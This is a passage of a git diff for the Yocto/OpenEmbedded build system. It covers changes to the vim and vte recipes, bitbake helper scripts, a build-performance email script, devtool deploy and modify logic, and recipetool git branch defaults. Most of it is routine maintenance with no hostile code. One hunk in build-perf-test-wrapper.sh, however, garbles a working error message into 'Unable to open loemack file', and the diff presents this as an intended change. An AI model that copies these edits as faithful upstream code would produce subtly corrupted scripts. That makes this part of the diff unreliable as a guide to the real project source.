+ sed -i -e s/CP1251/cp1251/ po/ru.cp1251.po
aclocal
autoconf
cd ..
oe_runconf
touch src/auto/configure
touch src/auto/config.mk src/auto/config.h
+ # need a native tool, not a target one
+ ${BUILD_CC} src/po/sjiscorr.c -o src/po/sjiscorr
}
-do_compile() {
- # We do not support fully / correctly the following locales. Attempting
- # to use these with msgfmt in order to update the ".desktop" files exposes
- # this problem and leads to the compile failing.
- for LOCALE in cs fr ko pl sk zh_CN zh_TW;do
- echo -n > src/po/${LOCALE}.po
- done
- autotools_do_compile
-}
-
-#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny
-PACKAGECONFIG ??= ""
-PACKAGECONFIG += " \
+PACKAGECONFIG ??= "\
${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \
${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \
+ nls \
"
PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3"
@@ -62,14 +66,18 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt,"
PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,,"
PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,"
PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils,"
+PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,,"
EXTRA_OECONF = " \
--disable-gpm \
--disable-gtktest \
--disable-xim \
--disable-netbeans \
+ --disable-desktop-database-update \
--with-tlib=ncurses \
+ --with-modified-by='${MAINTAINER}' \
ac_cv_small_wchar_t=no \
+ ac_cv_path_GLIB_COMPILE_RESOURCES=no \
vim_cv_getcwd_broken=no \
vim_cv_memmove_handles_overlap=yes \
vim_cv_stat_ignores_slash=no \
@@ -80,6 +88,11 @@ EXTRA_OECONF = " \
STRIP=/bin/true \
"
+# Some host distros don't have it, disable consistently
+# also disable on dunfell target builds
+EXTRA_OECONF_append_class-native = " vim_cv_timer_create=no"
+EXTRA_OECONF_append_class-target = " vim_cv_timer_create=no"
+
do_install() {
autotools_do_install
diff --git a/meta/recipes-support/vim/vim_8.2.bb b/meta/recipes-support/vim/vim_9.0.bb
index 709b6ddb55..709b6ddb55 100644
--- a/meta/recipes-support/vim/vim_8.2.bb
+++ b/meta/recipes-support/vim/vim_9.0.bb
diff --git a/meta/recipes-support/vte/vte_0.58.3.bb b/meta/recipes-support/vte/vte_0.58.3.bb
index 41dc2e77c9..50724700e8 100644
--- a/meta/recipes-support/vte/vte_0.58.3.bb
+++ b/meta/recipes-support/vte/vte_0.58.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Virtual terminal emulator GTK+ widget library"
+DESCRIPTION = "VTE provides a virtual terminal widget for GTK applications."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Terminal/VTE"
BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte"
LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+"
LICENSE_libvte = "LGPLv3+"
diff --git a/scripts/bitbake-whatchanged b/scripts/bitbake-whatchanged
index 3095dafa46..6f4b268119 100755
--- a/scripts/bitbake-whatchanged
+++ b/scripts/bitbake-whatchanged
@@ -217,7 +217,7 @@ print what will be done between the current and last builds, for example:
# Edit the recipes
$ bitbake-whatchanged core-image-sato
-The changes will be printed"
+The changes will be printed.
Note:
The amount of tasks is not accurate when the task is "do_build" since
diff --git a/scripts/buildhistory-diff b/scripts/buildhistory-diff
index 833f7c33a5..02eedafd6e 100755
--- a/scripts/buildhistory-diff
+++ b/scripts/buildhistory-diff
@@ -11,7 +11,6 @@
import sys
import os
import argparse
-from distutils.version import LooseVersion
# Ensure PythonGit is installed (buildhistory_analysis needs it)
try:
@@ -71,10 +70,6 @@ def main():
parser = get_args_parser()
args = parser.parse_args()
- if LooseVersion(git.__version__) < '0.3.1':
- sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n")
- sys.exit(1)
-
if len(args.revisions) > 2:
sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:]))
parser.print_help()
diff --git a/scripts/contrib/build-perf-test-wrapper.sh b/scripts/contrib/build-perf-test-wrapper.sh
index fa71d4a2e9..0a85e6e708 100755
--- a/scripts/contrib/build-perf-test-wrapper.sh
+++ b/scripts/contrib/build-perf-test-wrapper.sh
@@ -87,21 +87,10 @@ if [ $# -ne 0 ]; then
exit 1
fi
-if [ -n "$email_to" ]; then
- if ! [ -x "$(command -v phantomjs)" ]; then
- echo "ERROR: Sending email needs phantomjs."
- exit 1
- fi
- if ! [ -x "$(command -v optipng)" ]; then
- echo "ERROR: Sending email needs optipng."
- exit 1
- fi
-fi
-
# Open a file descriptor for flock and acquire lock
LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock"
if ! exec 3> "$LOCK_FILE"; then
- echo "ERROR: Unable to open lock file"
+ echo "ERROR: Unable to open loemack file"
exit 1
fi
if ! flock -n 3; then
@@ -226,7 +215,7 @@ if [ -n "$results_repo" ]; then
if [ -n "$email_to" ]; then
echo "Emailing test report"
os_name=`get_os_release_var PRETTY_NAME`
- "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt --html $report_html "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
+ "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
fi
# Upload report files, unless we're on detached head
diff --git a/scripts/contrib/convert-srcuri.py b/scripts/contrib/convert-srcuri.py
new file mode 100755
index 0000000000..5b362ea2e8
--- /dev/null
+++ b/scripts/contrib/convert-srcuri.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python3
+#
+# Conversion script to update SRC_URI to add branch to git urls
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import re
+import os
+import sys
+import tempfile
+import shutil
+import mimetypes
+
+if len(sys.argv) < 2:
+ print("Please specify a directory to run the conversion script against.")
+ sys.exit(1)
+
+def processfile(fn):
+ def matchline(line):
+ if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line:
+ return False
+ return True
+ print("processing file '%s'" % fn)
+ try:
+ if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn:
+ return
+ fh, abs_path = tempfile.mkstemp()
+ modified = False
+ with os.fdopen(fh, 'w') as new_file:
+ with open(fn, "r") as old_file:
+ for line in old_file:
+ if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line):
+ if line.endswith('"\n'):
+ line = line.replace('"\n', ';branch=master"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';branch=master \\\n')
+ modified = True
+ if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line):
+ if "protocol=git" in line:
+ line = line.replace('protocol=git', 'protocol=https')
+ elif line.endswith('"\n'):
+ line = line.replace('"\n', ';protocol=https"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';protocol=https \\\n')
+ modified = True
+ new_file.write(line)
+ if modified:
+ shutil.copymode(fn, abs_path)
+ os.remove(fn)
+ shutil.move(abs_path, fn)
+ except UnicodeDecodeError:
+ pass
+
+ourname = os.path.basename(sys.argv[0])
+ourversion = "0.1"
+
+if os.path.isfile(sys.argv[1]):
+ processfile(sys.argv[1])
+ sys.exit(0)
+
+for targetdir in sys.argv[1:]:
+ print("processing directory '%s'" % targetdir)
+ for root, dirs, files in os.walk(targetdir):
+ for name in files:
+ if name == ourname:
+ continue
+ fn = os.path.join(root, name)
+ if os.path.islink(fn):
+ continue
+ if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"):
+ continue
+ processfile(fn)
+
+print("All files processed with version %s" % ourversion)
diff --git a/scripts/contrib/documentation-audit.sh b/scripts/contrib/documentation-audit.sh
index 1191f57a8e..f436f9bae0 100755
--- a/scripts/contrib/documentation-audit.sh
+++ b/scripts/contrib/documentation-audit.sh
@@ -27,7 +27,7 @@ fi
echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results"
echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or "
-echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"Commercial\""
+echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"commercial\""
for pkg in `bitbake -s | awk '{ print \$1 }'`; do
if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" ||
diff --git a/scripts/contrib/oe-build-perf-report-email.py b/scripts/contrib/oe-build-perf-report-email.py
index de3862c897..7192113c28 100755
--- a/scripts/contrib/oe-build-perf-report-email.py
+++ b/scripts/contrib/oe-build-perf-report-email.py
@@ -19,8 +19,6 @@ import socket
import subprocess
import sys
import tempfile
-from email.mime.image import MIMEImage
-from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
@@ -29,30 +27,6 @@ logging.basicConfig(level=logging.INFO, format="%(levelname)s: %(message)s")
log = logging.getLogger('oe-build-perf-report')
-# Find js scaper script
-SCRAPE_JS = os.path.join(os.path.dirname(__file__), '..', 'lib', 'build_perf',
- 'scrape-html-report.js')
-if not os.path.isfile(SCRAPE_JS):
- log.error("Unableto find oe-build-perf-report-scrape.js")
- sys.exit(1)
-
-
-class ReportError(Exception):
- """Local errors"""
- pass
-
-
-def check_utils():
- """Check that all needed utils are installed in the system"""
- missing = []
- for cmd in ('phantomjs', 'optipng'):
- if not shutil.which(cmd):
- missing.append(cmd)
- if missing:
- log.error("The following tools are missing: %s", ' '.join(missing))
- sys.exit(1)
-
-
def parse_args(argv):
"""Parse command line arguments"""
description = """Email build perf test report"""
@@ -77,137 +51,19 @@ def parse_args(argv):
"the email parts")
parser.add_argument('--text',
help="Plain text message")
- parser.add_argument('--html',
- help="HTML peport generated by oe-build-perf-report")
- parser.add_argument('--phantomjs-args', action='append',
- help="Extra command line arguments passed to PhantomJS")
args = parser.parse_args(argv)
- if not args.html and not args.text:
- parser.error("Please specify --html and/or --text")
+ if not args.text:
+ parser.error("Please specify --text")
return args
-def decode_png(infile, outfile):
- """Parse/decode/optimize png data from a html element"""
- with open(infile) as f:
- raw_data = f.read()
-
- # Grab raw base64 data
- b64_data = re.sub('^.*href="data:image/png;base64,', '', raw_data, 1)
- b64_data = re.sub('">.+$', '', b64_data, 1)
-
- # Replace file with proper decoded png
- with open(outfile, 'wb') as f:
- f.write(base64.b64decode(b64_data))
-
- subprocess.check_output(['optipng', outfile], stderr=subprocess.STDOUT)
-
-
-def mangle_html_report(infile, outfile, pngs):
- """Mangle html file into a email compatible format"""
- paste = True
- png_dir = os.path.dirname(outfile)
- with open(infile) as f_in:
- with open(outfile, 'w') as f_out:
- for line in f_in.readlines():
- stripped = line.strip()
- # Strip out scripts
- if stripped == '<!--START-OF-SCRIPTS-->':
- paste = False
- elif stripped == '<!--END-OF-SCRIPTS-->':
- paste = True
- elif paste:
- if re.match('^.+href="data:image/png;base64', stripped):
- # Strip out encoded pngs (as they're huge in size)
- continue
- elif 'www.gstatic.com' in stripped:
- # HACK: drop references to external static pages
- continue
-
- # Replace charts with <img> elements
- match = re.match('<div id="(?P<id>\w+)"', stripped)
- if match and match.group('id') in pngs:
- f_out.write('<img src="cid:{}"\n'.format(match.group('id')))
- else:
- f_out.write(line)
-
-
-def scrape_html_report(report, outdir, phantomjs_extra_args=None):
- """Scrape html report into a format sendable by email"""
- tmpdir = tempfile.mkdtemp(dir='.')
- log.debug("Using tmpdir %s for phantomjs output", tmpdir)
-
- if not os.path.isdir(outdir):
- os.mkdir(outdir)
- if os.path.splitext(report)[1] not in ('.html', '.htm'):
- raise ReportError("Invalid file extension for report, needs to be "
- "'.html' or '.htm'")
-
- try:
- log.info("Scraping HTML report with PhangomJS")
- extra_args = phantomjs_extra_args if phantomjs_extra_args else []
- subprocess.check_output(['phantomjs', '--debug=true'] + extra_args +
- [SCRAPE_JS, report, tmpdir],
- stderr=subprocess.STDOUT)
-
- pngs = []
- images = []
- for fname in os.listdir(tmpdir):
- base, ext = os.path.splitext(fname)
- if ext == '.png':
- log.debug("Decoding %s", fname)
- decode_png(os.path.join(tmpdir, fname),
- os.path.join(outdir, fname))
- pngs.append(base)
- images.append(fname)
- elif ext in ('.html', '.htm'):
- report_file = fname
- else:
- log.warning("Unknown file extension: '%s'", ext)
- #shutil.move(os.path.join(tmpdir, fname), outdir)
-
- log.debug("Mangling html report file %s", report_file)
- mangle_html_report(os.path.join(tmpdir, report_file),
- os.path.join(outdir, report_file), pngs)
- return (os.path.join(outdir, report_file),
- [os.path.join(outdir, i) for i in images])
- finally:
- shutil.rmtree(tmpdir)
-
-def send_email(text_fn, html_fn, image_fns, subject, recipients, copy=[],
- blind_copy=[]):
- """Send email"""
+def send_email(text_fn, subject, recipients, copy=[], blind_copy=[]):
# Generate email message
- text_msg = html_msg = None
- if text_fn:
- with open(text_fn) as f:
- text_msg = MIMEText("Yocto build performance test report.\n" +
- f.read(), 'plain')
- if html_fn:
- html_msg = msg = MIMEMultipart('related')
- with open(html_fn) as f:
- html_msg.attach(MIMEText(f.read(), 'html'))
- for img_fn in image_fns:
- # Expect that content id is same as the filename
- cid = os.path.splitext(os.path.basename(img_fn))[0]
- with open(img_fn, 'rb') as f:
- image_msg = MIMEImage(f.read())
- image_msg['Content-ID'] = '<{}>'.format(cid)
- html_msg.attach(image_msg)
-
- if text_msg and html_msg:
- msg = MIMEMultipart('alternative')
- msg.attach(text_msg)
- msg.attach(html_msg)
- elif text_msg:
- msg = text_msg
- elif html_msg:
- msg = html_msg
- else:
- raise ReportError("Neither plain text nor html body specified")
+ with open(text_fn) as f:
+ msg = MIMEText("Yocto build performance test report.\n" + f.read(), 'plain')
pw_data = pwd.getpwuid(os.getuid())
full_name = pw_data.pw_gecos.split(',')[0]
@@ -234,8 +90,6 @@ def main(argv=None):
if args.debug:
log.setLevel(logging.DEBUG)
- check_utils()
-
if args.outdir:
outdir = args.outdir
if not os.path.exists(outdir):
@@ -245,25 +99,16 @@ def main(argv=None):
try:
log.debug("Storing email parts in %s", outdir)
- html_report = images = None
- if args.html:
- html_report, images = scrape_html_report(args.html, outdir,
- args.phantomjs_args)
-
if args.to:
log.info("Sending email to %s", ', '.join(args.to))
if args.cc:
log.info("Copying to %s", ', '.join(args.cc))
if args.bcc:
log.info("Blind copying to %s", ', '.join(args.bcc))
- send_email(args.text, html_report, images, args.subject,
- args.to, args.cc, args.bcc)
+ send_email(args.text, args.subject, args.to, args.cc, args.bcc)
except subprocess.CalledProcessError as err:
log.error("%s, with output:\n%s", str(err), err.output.decode())
return 1
- except ReportError as err:
- log.error(err)
- return 1
finally:
if not args.outdir:
log.debug("Wiping %s", outdir)
diff --git a/scripts/create-pull-request b/scripts/create-pull-request
index 8eefcf63a5..2f91a355b0 100755
--- a/scripts/create-pull-request
+++ b/scripts/create-pull-request
@@ -128,7 +128,7 @@ PROTO_RE="[a-z][a-z+]*://"
GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)"
REMOTE_URL=${REMOTE_URL%.git}
REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#")
-REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#git://\4/\5#")
+REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#https://\4/\5#")
if [ -z "$BRANCH" ]; then
BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2)
diff --git a/scripts/git b/scripts/git
new file mode 100755
index 0000000000..644055e540
--- /dev/null
+++ b/scripts/git
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'git' that doesn't think we are root
+
+import os
+import shutil
+import sys
+
+os.environ['PSEUDO_UNLOAD'] = '1'
+
+# calculate path to the real 'git'
+path = os.environ['PATH']
+# we need to remove our path but also any other copy of this script which
+# may be present, e.g. eSDK.
+replacements = [os.path.dirname(sys.argv[0])]
+for p in path.split(":"):
+ if p.endswith("/scripts"):
+ replacements.append(p)
+for r in replacements:
+ path = path.replace(r, '/ignoreme')
+real_git = shutil.which('git', path=path)
+
+if len(sys.argv) == 1:
+ os.execl(real_git, 'git')
+
+os.execv(real_git, sys.argv)
diff --git a/scripts/lib/buildstats.py b/scripts/lib/buildstats.py
index c69b5bf4d7..3b76286ba5 100644
--- a/scripts/lib/buildstats.py
+++ b/scripts/lib/buildstats.py
@@ -8,7 +8,7 @@ import json
import logging
import os
import re
-from collections import namedtuple,OrderedDict
+from collections import namedtuple
from statistics import mean
@@ -238,7 +238,7 @@ class BuildStats(dict):
subdirs = os.listdir(path)
for dirname in subdirs:
recipe_dir = os.path.join(path, dirname)
- if not os.path.isdir(recipe_dir):
+ if dirname == "reduced_proc_pressure" or not os.path.isdir(recipe_dir):
continue
name, epoch, version, revision = cls.split_nevr(dirname)
bsrecipe = BSRecipe(name, epoch, version, revision)
diff --git a/scripts/lib/checklayer/__init__.py b/scripts/lib/checklayer/__init__.py
index fe545607bb..e69a10f452 100644
--- a/scripts/lib/checklayer/__init__.py
+++ b/scripts/lib/checklayer/__init__.py
@@ -146,7 +146,7 @@ def detect_layers(layer_directories, no_auto):
return layers
-def _find_layer_depends(depend, layers):
+def _find_layer(depend, layers):
for layer in layers:
if 'collections' not in layer:
continue
@@ -156,7 +156,7 @@ def _find_layer_depends(depend, layers):
return layer
return None
-def add_layer_dependencies(bblayersconf, layer, layers, logger):
+def get_layer_dependencies(layer, layers, logger):
def recurse_dependencies(depends, layer, layers, logger, ret = []):
logger.debug('Processing dependencies %s for layer %s.' % \
(depends, layer['name']))
@@ -166,7 +166,7 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
if depend == 'core':
continue
- layer_depend = _find_layer_depends(depend, layers)
+ layer_depend = _find_layer(depend, layers)
if not layer_depend:
logger.error('Layer %s depends on %s and isn\'t found.' % \
(layer['name'], depend))
@@ -203,6 +203,11 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends)
# Note: [] (empty) is allowed, None is not!
+ return layer_depends
+
+def add_layer_dependencies(bblayersconf, layer, layers, logger):
+
+ layer_depends = get_layer_dependencies(layer, layers, logger)
if layer_depends is None:
return False
else:
diff --git a/scripts/lib/checklayer/cases/common.py b/scripts/lib/checklayer/cases/common.py
index b82304e361..4495f71b24 100644
--- a/scripts/lib/checklayer/cases/common.py
+++ b/scripts/lib/checklayer/cases/common.py
@@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase):
# The top-level README file may have a suffix (like README.rst or README.txt).
readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*'))
self.assertTrue(len(readme_files) > 0,
- msg="Layer doesn't contains README file.")
+ msg="Layer doesn't contain a README file.")
# There might be more than one file matching the file pattern above
# (for example, README.rst and README-COPYING.rst). The one with the shortest
diff --git a/scripts/lib/devtool/deploy.py b/scripts/lib/devtool/deploy.py
index aaa25dda08..b4f9fbfe45 100644
--- a/scripts/lib/devtool/deploy.py
+++ b/scripts/lib/devtool/deploy.py
@@ -168,9 +168,9 @@ def deploy(args, config, basepath, workspace):
if args.strip and not args.dry_run:
# Fakeroot copy to new destination
srcdir = recipe_outdir
- recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'deploy-target-stripped')
+ recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'devtool-deploy-target-stripped')
if os.path.isdir(recipe_outdir):
- bb.utils.remove(recipe_outdir, True)
+ exec_fakeroot(rd, "rm -rf %s" % recipe_outdir, shell=True)
exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True)
os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or ''])
oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'),
@@ -201,9 +201,9 @@ def deploy(args, config, basepath, workspace):
print(' %s' % item)
return 0
- extraoptions = ''
+ extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
if args.no_host_check:
- extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
if not args.show_status:
extraoptions += ' -q'
@@ -274,9 +274,9 @@ def undeploy(args, config, basepath, workspace):
elif not args.recipename and not args.all:
raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target')
- extraoptions = ''
+ extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
if args.no_host_check:
- extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
if not args.show_status:
extraoptions += ' -q'
diff --git a/scripts/lib/devtool/menuconfig.py b/scripts/lib/devtool/menuconfig.py
index 95384c5333..ff9227035d 100644
--- a/scripts/lib/devtool/menuconfig.py
+++ b/scripts/lib/devtool/menuconfig.py
@@ -43,7 +43,7 @@ def menuconfig(args, config, basepath, workspace):
return 1
check_workspace_recipe(workspace, args.component)
- pn = rd.getVar('PN', True)
+ pn = rd.getVar('PN')
if not rd.getVarFlag('do_menuconfig','task'):
raise DevtoolError("This recipe does not support menuconfig option")
diff --git a/scripts/lib/devtool/standard.py b/scripts/lib/devtool/standard.py
index d140b97de1..cfa88616af 100644
--- a/scripts/lib/devtool/standard.py
+++ b/scripts/lib/devtool/standard.py
@@ -357,7 +357,7 @@ def _move_file(src, dst, dry_run_outdir=None, base_outdir=None):
bb.utils.mkdirhier(dst_d)
shutil.move(src, dst)
-def _copy_file(src, dst, dry_run_outdir=None):
+def _copy_file(src, dst, dry_run_outdir=None, base_outdir=None):
"""Copy a file. Creates all the directory components of destination path."""
dry_run_suffix = ' (dry-run)' if dry_run_outdir else ''
logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix))
@@ -474,7 +474,11 @@ def symlink_oelocal_files_srctree(rd,srctree):
destpth = os.path.join(srctree, relpth, fn)
if os.path.exists(destpth):
os.unlink(destpth)
- os.symlink('oe-local-files/%s' % fn, destpth)
+ if relpth != '.':
+ back_relpth = os.path.relpath(local_files_dir, root)
+ os.symlink('%s/oe-local-files/%s/%s' % (back_relpth, relpth, fn), destpth)
+ else:
+ os.symlink('oe-local-files/%s' % fn, destpth)
addfiles.append(os.path.join(relpth, fn))
if addfiles:
bb.process.run('git add %s' % ' '.join(addfiles), cwd=srctree)
@@ -531,7 +535,6 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
initial_rev = None
- appendexisted = False
recipefile = d.getVar('FILE')
appendfile = recipe_to_append(recipefile, config)
is_kernel_yocto = bb.data.inherits_class('kernel-yocto', d)
@@ -590,6 +593,16 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
else:
task = 'do_patch'
+ if 'noexec' in (d.getVarFlags(task, False) or []) or 'task' not in (d.getVarFlags(task, False) or []):
+ logger.info('The %s recipe has %s disabled. Running only '
+ 'do_configure task dependencies' % (pn, task))
+
+ if 'depends' in d.getVarFlags('do_configure', False):
+ pn = d.getVarFlags('do_configure', False)['depends']
+ pn = pn.replace('${PV}', d.getVar('PV'))
+ pn = pn.replace('${COMPILERDEP}', d.getVar('COMPILERDEP'))
+ task = None
+
# Run the fetch + unpack tasks
res = tinfoil.build_targets(pn,
task,
@@ -601,6 +614,17 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
if not res:
raise DevtoolError('Extracting source for %s failed' % pn)
+ if not is_kernel_yocto and ('noexec' in (d.getVarFlags('do_patch', False) or []) or 'task' not in (d.getVarFlags('do_patch', False) or [])):
+ workshareddir = d.getVar('S')
+ if os.path.islink(srctree):
+ os.unlink(srctree)
+
+ os.symlink(workshareddir, srctree)
+
+ # The initial_rev file is created in devtool_post_unpack function that will not be executed if
+ # do_unpack/do_patch tasks are disabled so we have to directly say that source extraction was successful
+ return True, True
+
try:
with open(os.path.join(tempdir, 'initial_rev'), 'r') as f:
initial_rev = f.read()
@@ -848,10 +872,11 @@ def modify(args, config, basepath, workspace):
if not initial_rev:
return 1
logger.info('Source tree extracted to %s' % srctree)
- # Get list of commits since this revision
- (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
- commits = stdout.split()
- check_commits = True
+ if os.path.exists(os.path.join(srctree, '.git')):
+ # Get list of commits since this revision
+ (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
+ commits = stdout.split()
+ check_commits = True
else:
if os.path.exists(os.path.join(srctree, '.git')):
# Check if it's a tree previously extracted by us. This is done
@@ -928,12 +953,17 @@ def modify(args, config, basepath, workspace):
if bb.data.inherits_class('kernel', rd):
f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout '
- 'do_fetch do_unpack do_kernel_configme do_kernel_configcheck"\n')
+ 'do_fetch do_unpack do_kernel_configcheck"\n')
f.write('\ndo_patch[noexec] = "1"\n')
f.write('\ndo_configure_append() {\n'
' cp ${B}/.config ${S}/.config.baseline\n'
' ln -sfT ${B}/.config ${S}/.config.new\n'
'}\n')
+ f.write('\ndo_kernel_configme_prepend() {\n'
+ ' if [ -e ${S}/.config ]; then\n'
+ ' mv ${S}/.config ${S}/.config.old\n'
+ ' fi\n'
+ '}\n')
if rd.getVarFlag('do_menuconfig','task'):
f.write('\ndo_configure_append() {\n'
' if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n'
diff --git a/scripts/lib/recipetool/create.py b/scripts/lib/recipetool/create.py
index 566c75369a..a2c6d052a6 100644
--- a/scripts/lib/recipetool/create.py
+++ b/scripts/lib/recipetool/create.py
@@ -435,7 +435,7 @@ def create_recipe(args):
if args.binary:
# Assume the archive contains the directory structure verbatim
# so we need to extract to a subdirectory
- fetchuri += ';subdir=${BP}'
+ fetchuri += ';subdir=${BPN}'
srcuri = fetchuri
rev_re = re.compile(';rev=([^;]+)')
res = rev_re.search(srcuri)
@@ -478,6 +478,9 @@ def create_recipe(args):
storeTagName = params['tag']
params['nobranch'] = '1'
del params['tag']
+ # Assume 'master' branch if not set
+ if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params:
+ params['branch'] = 'master'
fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params))
tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR')
@@ -527,10 +530,9 @@ def create_recipe(args):
# Remove HEAD reference point and drop remote prefix
get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')]
if 'master' in get_branch:
- # If it is master, we do not need to append 'branch=master' as this is default.
# Even with the case where get_branch has multiple objects, if 'master' is one
# of them, we should default take from 'master'
- srcbranch = ''
+ srcbranch = 'master'
elif len(get_branch) == 1:
# If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch'
srcbranch = get_branch[0]
@@ -543,8 +545,8 @@ def create_recipe(args):
# Since we might have a value in srcbranch, we need to
# recontruct the srcuri to include 'branch' in params.
scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri)
- if srcbranch:
- params['branch'] = srcbranch
+ if scheme in ['git', 'gitsm']:
+ params['branch'] = srcbranch or 'master'
if storeTagName and scheme in ['git', 'gitsm']:
# Check srcrev using tag and check validity of the tag
@@ -603,7 +605,7 @@ def create_recipe(args):
splitline = line.split()
if len(splitline) > 1:
if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]):
- srcuri = reformat_git_uri(splitline[1])
+ srcuri = reformat_git_uri(splitline[1]) + ';branch=master'
srcsubdir = 'git'
break
@@ -743,6 +745,10 @@ def create_recipe(args):
for handler in handlers:
handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues)
+ # native and nativesdk classes are special and must be inherited last
+ # If present, put them at the end of the classes list
+ classes.sort(key=lambda c: c in ("native", "nativesdk"))
+
extrafiles = extravalues.pop('extrafiles', {})
extra_pn = extravalues.pop('PN', None)
extra_pv = extravalues.pop('PV', None)
diff --git a/scripts/lib/resulttool/report.py b/scripts/lib/resulttool/report.py
index f0ca50ebe2..a349510ab8 100644
--- a/scripts/lib/resulttool/report.py
+++ b/scripts/lib/resulttool/report.py
@@ -176,7 +176,10 @@ class ResultsTextReport(object):
vals['sort'] = line['testseries'] + "_" + line['result_id']
vals['failed_testcases'] = line['failed_testcases']
for k in cols:
- vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+ if total_tested:
+ vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+ else:
+ vals[k] = "0 (0%)"
for k in maxlen:
if k in vals and len(vals[k]) > maxlen[k]:
maxlen[k] = len(vals[k])
diff --git a/scripts/lib/resulttool/resultutils.py b/scripts/lib/resulttool/resultutils.py
index 8917022d36..c5521d81bd 100644
--- a/scripts/lib/resulttool/resultutils.py
+++ b/scripts/lib/resulttool/resultutils.py
@@ -58,7 +58,11 @@ def append_resultsdata(results, f, configmap=store_map, configvars=extra_configv
testseries = posixpath.basename(posixpath.dirname(url.path))
else:
with open(f, "r") as filedata:
- data = json.load(filedata)
+ try:
+ data = json.load(filedata)
+ except json.decoder.JSONDecodeError:
+ print("Cannot decode {}. Possible corruption. Skipping.".format(f))
+ data = ""
testseries = os.path.basename(os.path.dirname(f))
else:
data = f
